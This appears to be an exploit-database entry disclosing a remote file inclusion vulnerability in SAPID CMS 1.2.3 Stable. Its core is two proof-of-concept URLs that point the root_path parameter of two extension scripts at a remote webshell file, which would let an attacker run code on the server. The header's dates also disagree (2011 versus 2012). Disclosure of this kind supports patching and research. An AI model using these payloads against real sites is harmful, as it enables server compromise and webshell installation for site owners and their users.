SAPID 1.2.3 Stable Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SAPID 1.2.3 Stable Remote File Inclusion Vulnerability
# Published : 2012-01-09
# Author :
# Previous Title : phplist - version 2.10.9 CSRF/XSS Vulnerability
# Next Title : phux Download Manager Blind SQL Injection Vulnerability

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula